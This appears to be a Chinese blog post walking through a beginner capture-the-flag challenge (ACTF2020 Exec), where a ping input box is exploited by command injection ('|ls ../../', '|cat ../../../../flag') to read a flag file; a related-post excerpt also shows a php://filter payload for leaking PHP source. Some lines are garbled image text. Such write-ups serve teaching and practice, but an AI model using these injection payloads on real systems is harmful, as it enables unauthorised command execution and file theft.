首页 > 其他分享 >[ACTF2020 新生赛]Exec 1

[ACTF2020 新生赛]Exec 1

时间:2023-06-17 11:24:36浏览次数:35  
标签:文件 ACTF2020 .. Exec 新生 flag 执行

查看源代码,发现并没有什么东西

有一个可以输入的框框,想到命令执行

ls可以在linux查看文件

由于不知道在哪个文件下,用../../进行判断--注意执行前面要有|

PING  PING

看到文件

do  e ! pau  Ser J  Rap

再次执行|cat ../../../../flag

9Nld  ONIC

得到flag

ANG  PING  flag{a271aa28-2aø9-ab54-9a86-fea1ee5f7fba}

标签:文件,ACTF2020,..,Exec,新生,flag,执行
From: https://www.cnblogs.com/GoldfishMemory/p/17487238.html

相关文章

  • [ACTF2020新生赛]Include
    >[ACTF2020新生赛**]Include**由于是file伪协议打开flag.php文件可能存在文件漏洞进入发现没有flag进行猜测flag存在flag.php源代码中可以利用php://filter伪协议来查看flag.php的源代码,构造payload:?file=php://filter/convert.base64-encode/resource=flag.php看到文件......
  • CMU15445 (Fall 2020) 数据库系统 Project#3 - Query Execution 详解
    前言经过前两个实验的铺垫,终于到了执行SQL语句的时候了。这篇博客将会介绍SQL执行计划实验的实现过程,下面进入正题。总体架构一条SQL查询的处理流程如下为:SQL被Parser解析为抽象语法树ASTBinber将AST转换为Bustub可以理解的更高级的ASTTreerewriter将语法......
  • jpa2.2.10 JpaSpecificationExecutor Specification 查询时,实体类中存在@OneToMany,怎
    对于这个问题,您可以在查询时通过join()方法指定不查询@OneToMany关联表。举个例子,如果有一个实体A与实体B是一对多关系,那么您可以这样写查询条件:@OneToMany(targetEntity=DcyRightImage.class,cascade={CascadeType.ALL},fetch=FetchType.EAGER)@JoinColumn(nam......
  • ScheduledThreadPoolExecutor模仿学习
     publicinterfaceCBlockingQueue<E>{booleanadd(Ee);Etake();} importjava.util.concurrent.Delayed;importjava.util.concurrent.FutureTask;importjava.util.concurrent.RunnableScheduledFuture;importjava.util.concurrent.TimeUnit;......
  • CMU15-445 Project3 Query Execution心得
    Project3QueryExecution心得一、概述首先要说:这个project很有趣很硬核!从这个project开始才感觉自己在数据库方面真正成长了!第一个project:bufferpoolmanager相对独立且简单,说白了就是使用LRU-K算法维护一个page数组,2022fall又加了一点内容:使用可扩展哈希来将对......
  • Runtime.getRuntime().exec("ipconfig") 的用法
    ​ `Runtime.getRuntime().exec()`是Java中的一个方法,可以在Java程序中执行外部程序。这个方法返回一个`Process`对象,可以用于控制和查看执行的外部程序。`exec()`方法有多个重载版本,可以传递不同的参数来控制执行的外部程序。例如:importjava.io.BufferedReader;import......
  • Runtime.getRuntime().exec("ipconfig") 的用法
    ​ `Runtime.getRuntime().exec()`是Java中的一个方法,可以在Java程序中执行外部程序。这个方法返回一个`Process`对象,可以用于控制和查看执行的外部程序。`exec()`方法有多个重载版本,可以传递不同的参数来控制执行的外部程序。例如:importjava.io.BufferedReader;import......
  • send it failed() The virtual circuit was reset by the remote side executing a ha
    串口调试助手报错提示Thevirtualcircuitwasresetbytheremotesideexecutingahardorabortiveclose.forupdsocket,theremotehostwasunabletodeliverapreviouslysentUDPdategramandrespondedwithaportunreachableICMPpackettheapplicationsh......
  • cmake设置gcc将shared library 改为生成 executeable
    前文ubuntu下,同一份代码,使用gcc和clang编译结果不相同。gcc编译结果,生成的程序为type为sharedlibary,而clang编译生成的程序的type为executeable.解决方案为cmakelists.txt脚本增加如下脚本set(CMAKE_CXX_FLAGS"-no-pie")set(CMAKE_C_FLAGS"-......
  • Docker CLI docker exec 常用命令
    Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中,然后发布到任何流行的Linux或Windows操作系统的机器上,也可以实现虚拟化。Docker是内核虚拟化,不使用Hypervisor是不完全虚拟化,依赖内核的特性实现资源隔离。本文主要介绍DockerCLI中d......